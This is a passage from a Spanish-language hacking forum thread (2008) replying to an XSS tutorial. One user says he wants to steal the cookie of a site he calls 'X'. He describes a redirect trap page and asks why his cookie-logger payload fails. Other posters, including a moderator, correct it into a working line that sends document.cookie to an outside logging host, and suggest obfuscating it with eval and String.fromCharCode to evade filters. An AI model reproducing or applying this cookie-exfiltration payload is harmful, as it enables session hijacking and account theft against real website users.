elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado:


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  XSS - Mas allá del alert(); By: Tec-n0x
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 [2] Ir Abajo Respuesta Imprimir
Autor Tema: XSS - Mas allá del alert(); By: Tec-n0x  (Leído 10,820 veces)
perverthso

Desconectado Desconectado

Mensajes: 25



Ver Perfil
Re: XSS - Mas allá del alert(); By: Tec-n0x
« Respuesta #10 en: 6 Julio 2008, 23:56 pm »

muy bueno y creativo el tutorial felicitaciones
En línea

er_davids

Desconectado Desconectado

Mensajes: 14


Ver Perfil
Re: XSS - Mas allá del alert(); By: Tec-n0x
« Respuesta #11 en: 7 Julio 2008, 18:38 pm »

Voy de problema en problema  :-\ >:(

Gracias a el método de yeikos he conseguido que me cargue las funciones del javascript con letras. Vale os voy a explicar así un poco para que sepaís que pretendo hacer:

Tengo una web "X" a la que le quiero sacar la cookie. Como en el foro no puedo utilizar <script></script>, se me ocurrió poner un link a un servidor mío a una página "Y" que con un meta refresh redirija a la página "X" pero con el XSS ya introducido en la URL.

Vale hasta ahora bien, todo funciona perfectamente hasta que llega a la mitad del script:

Citar
document.location=http://miweb.com/cookielogger.php?cookie + document.cookie

Vale el document.location lo realiza correctamente porque me redirige a cookielogger.php pero la cookie no aparece por ningún lado. Le he puesto un print para comprobarlo y me aparace ==> document.cookie. La cookie sigue desaparecida x'D

También he probdo con document.location=http://miweb.com/cookielogger.php?cookie= document.cookie, pero nada me sigue apareciendo document.cookie en vez de la cookie.

Me he quemado ya la cabeza de tanto pensar en que puede fallar y no se qué es, haber si me podéis echar una mano. Se me ha ocurrido de que al irse a mi hosting al no haber cookie no me la muestre, pero como le hago el location al otro hosting sí debería de aparecer :S no se, estoy confuso :S
En línea

Azielito
no es
Colaborador
***
Desconectado Desconectado

Mensajes: 9.188


>.<


Ver Perfil WWW
Re: XSS - Mas allá del alert(); By: Tec-n0x
« Respuesta #12 en: 8 Julio 2008, 20:48 pm »

por que lo toma como cadena, has uso de la funcion eval()

Código
  1. eval('document.location=http://miweb.com/cookielogger.php?cookie+document.cookie')
o algo asi xD
En línea

er_davids

Desconectado Desconectado

Mensajes: 14


Ver Perfil
Re: XSS - Mas allá del alert(); By: Tec-n0x
« Respuesta #13 en: 8 Julio 2008, 21:12 pm »

Gracias por la respuesta pero no me ha valido o no he sabido colocarlo  :xD

Si queréis ver lo que sale el link de la web "trampa" que redirige está en www.pspandopower.com/prueba/index.php

Es una web de un hosting mio, por lo que estará permitido que lo ponga no? :D
En línea

sirdarckcat
Aspirante a supervillano
Moderador
***
Desconectado Desconectado

Mensajes: 7.029


No estoy loco, soy mentalmente divergente


Ver Perfil WWW
Re: XSS - Mas allá del alert(); By: Tec-n0x
« Respuesta #14 en: 8 Julio 2008, 22:39 pm »

no mams azielito eso está mal jaja
es..
document.location='http://miweb.com/cookielogger.php?cookie='+document.cookie
como tu dices saldrá error.

Saludos!!
En línea

Azielito
no es
Colaborador
***
Desconectado Desconectado

Mensajes: 9.188


>.<


Ver Perfil WWW
Re: XSS - Mas allá del alert(); By: Tec-n0x
« Respuesta #15 en: 9 Julio 2008, 00:33 am »

claro que esta mal xD


Creo que tendre que poner bien mis ejemplos de ahora en adelante, ya van com 3 que me corriges xDDD


bien...


Me refiero a que con la "funcion" que pones, lo ponga dentro del eval...
o sea (espero no equivocarme de nuevo xDDD)

Código
  1. eval(String.fromCharCode(97,108,101,114,116,40,39,104,111,108,97,39,41,59));
  2.  

claro, con las instrucciones correspondientes
En línea

Páginas: 1 [2] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
¿Hay vida más allá del FullHD?
Noticias
wolfbcn 0 1,202 Último mensaje 26 Abril 2011, 22:20 pm
por wolfbcn
Hay vida más allá de Megaupload « 1 2 3 4 »
Noticias
wolfbcn 38 10,706 Último mensaje 31 Diciembre 2012, 01:10 am
por beholdthe
Alert-Phising
Seguridad
-H4D3S- 0 1,414 Último mensaje 18 Abril 2013, 00:28 am
por -H4D3S-
Por qué tu móvil no concibe el tiempo más allá del año 2038
Noticias
wolfbcn 3 1,235 Último mensaje 5 Marzo 2014, 03:04 am
por simorg
Una broma con un alert!!! « 1 2 »
Desarrollo Web
Diesan Romero 15 5,638 Último mensaje 26 Julio 2016, 05:15 am
por [u]nsigned
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines